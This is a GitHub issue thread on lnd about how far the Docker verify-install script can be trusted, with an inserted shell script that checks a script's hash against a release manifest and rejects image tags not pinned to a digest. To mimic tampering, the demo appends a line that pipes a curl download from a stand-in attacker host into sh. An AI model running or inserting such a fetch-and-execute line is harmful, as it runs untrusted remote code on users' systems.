lightningnetwork / lnd

Lightning Network Daemon ⚡️
MIT License

Question about verify install #5780

Open naveensrinivasan opened 2 years ago

naveensrinivasan commented 2 years ago

Background

The docs in https://github.com/lightningnetwork/lnd/blob/master/docs/release.md refer to docker run --rm --entrypoint="" lightninglabs/lnd:v0.12.0-beta /verify-install.sh to verify install.

  1. What if the verify-install script was compromised in the Docker image? What I mean is, what if a malicious actor gets hold of the Docker push keys and pushes his own image with a verify-install script? What would happen then?
  2. This validates the lnd binary. How are you sure the Alpine image that this is built on hasn't been compromised?
  3. Could the Alpine image have been compromised and contain malware in the container image?

All of these questions relate to zero trust and the supply chain.

naveensrinivasan commented 2 years ago

Supply-chain Levels for Software Artifacts (SLSA) https://slsa.dev/levels.

The ideal would be level 4. But level 2 is a good target to get to.

https://security.googleblog.com/2021/09/distroless-builds-are-now-slsa-2.html

Roasbeef commented 2 years ago

Re #1, I think implementing proper image signing on our end would handle that, since it would allow users to verify the integrity of the image they receive. You're correct in that right now the instructions assume that the install script itself wasn't modified. That can be partially mitigated by including the hash of that script (right now we just include the entire source's digest) alongside the published releases.

naveensrinivasan commented 2 years ago

Now, if the release includes the hash of the install script, then that has to be validated by another script.

It is turtles all the way down.

The only option I can think of is signing the container.

naveensrinivasan commented 2 years ago

k8s is evaluating SLSA https://twitter.com/puerco/status/1441209142396346376

Kixunil commented 2 years ago

These steps can help you avoid malware:

  1. Don't use docker
  2. Install good secure OS (e.g. Debian)
  3. Download just the script, read it and verify, including fingerprints from independent sources
  4. Download, verify, install manually

Optionally automate 3.
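The two checks discussed in this thread, as an added shell example that is not lnd's release tooling and not the verify-install.sh the docs refer to: Roasbeef's suggestion of publishing the hash of the verify-install script alongside the release, and Kixunil's step of downloading, verifying and installing manually instead of running whatever a tag-addressed image happens to contain. The release directory, the manifest layout (sha256sum format, an assumption), the tampered copy of the script and the image references are all constructed locally so the script runs offline; nothing is fetched from GitHub or Docker Hub.

```shell
#!/bin/sh
# Added example, not lnd's own release tooling. It models two checks from the
# thread: (1) verify a downloaded verify-install.sh against a hash manifest
# published with the release, and (2) refuse an image referenced only by a
# mutable tag rather than an immutable digest. All inputs are constructed here.
set -eu

sha256_of() {
  # Portable SHA-256 of a file (GNU coreutils sha256sum, or perl shasum)
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{ print $1 }'
  else
    shasum -a 256 "$1" | awk '{ print $1 }'
  fi
}

# Publisher side (constructed stand-in for release assets): the script plus a
# manifest in sha256sum format. Assumption: the real manifest also covers the
# binaries and ships with a detached GPG signature, which is not modelled here.
make_release() {
  dir="$1"
  mkdir -p "$dir"
  printf '#!/bin/sh\necho "verifying lnd binary"\n' > "$dir/verify-install.sh"
  printf '%s  verify-install.sh\n' "$(sha256_of "$dir/verify-install.sh")" > "$dir/manifest.txt"
}

# Consumer side: return 0 only if the file's SHA-256 equals its manifest entry.
# A missing entry is a failure, not a pass, so a stripped-down manifest cannot
# be used to skip the check.
verify_against_manifest() {
  file="$1"; manifest="$2"
  name=$(basename "$file")
  expected=$(awk -v f="$name" '$2 == f { print $1 }' "$manifest")
  if [ -z "$expected" ]; then
    echo "FAIL: no manifest entry for $name" >&2
    return 1
  fi
  actual=$(sha256_of "$file")
  if [ "$expected" != "$actual" ]; then
    echo "FAIL: $name hash $actual does not match manifest $expected" >&2
    return 1
  fi
  echo "OK: $name matches manifest"
}

# A tag like lightninglabs/lnd:v0.12.0-beta can be re-pushed by anyone holding
# the push key; a sha256 digest cannot. Accept only digest-pinned references.
is_digest_pinned() {
  printf '%s\n' "$1" | grep -Eq '^[A-Za-z0-9._/-]+@sha256:[0-9a-f]{64}$'
}

# Demo over the constructed release: intact script passes, a script with an
# appended payload is rejected, and a tag-only image reference is refused.
demo() {
  work=$(mktemp -d)
  make_release "$work/release"
  mkdir -p "$work/tampered"
  cp "$work/release/verify-install.sh" "$work/tampered/verify-install.sh"
  printf 'curl -s https://attacker.invalid/payload | sh\n' >> "$work/tampered/verify-install.sh"

  verify_against_manifest "$work/release/verify-install.sh" "$work/release/manifest.txt"
  if verify_against_manifest "$work/tampered/verify-install.sh" "$work/release/manifest.txt"; then
    echo "BUG: tampered script accepted" >&2
    rm -rf "$work"
    return 1
  fi

  # Placeholder digest of all zeros: only the reference format is being checked.
  for ref in 'lightninglabs/lnd:v0.12.0-beta' \
             "lightninglabs/lnd@sha256:$(printf '%064d' 0)"; do
    if is_digest_pinned "$ref"; then
      echo "OK: digest-pinned reference $ref"
    else
      echo "REFUSE: tag-only reference $ref"
    fi
  done
  rm -rf "$work"
}

demo
```

The manifest check only moves the trust anchor, which is the "turtles all the way down" point made above: the manifest has to be authenticated first (its GPG signature, or its hash obtained from a source independent of the one that served the image) before the comparison means anything, and this script assumes that step has already been done by hand.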

naveensrinivasan commented 2 years ago

These steps can help you avoid malware:

  1. Don't use docker
  2. Install good secure OS (e.g. Debian)
  3. Download just the script, read it and verify, including fingerprints from independent sources
  4. Download, verify, install manually

Optionally automate 3.

Why not use Docker? Can you please provide specifics on that?

Recommendations are futile without evidence/details.

Kixunil commented 2 years ago

No docker - no problem with unsigned images.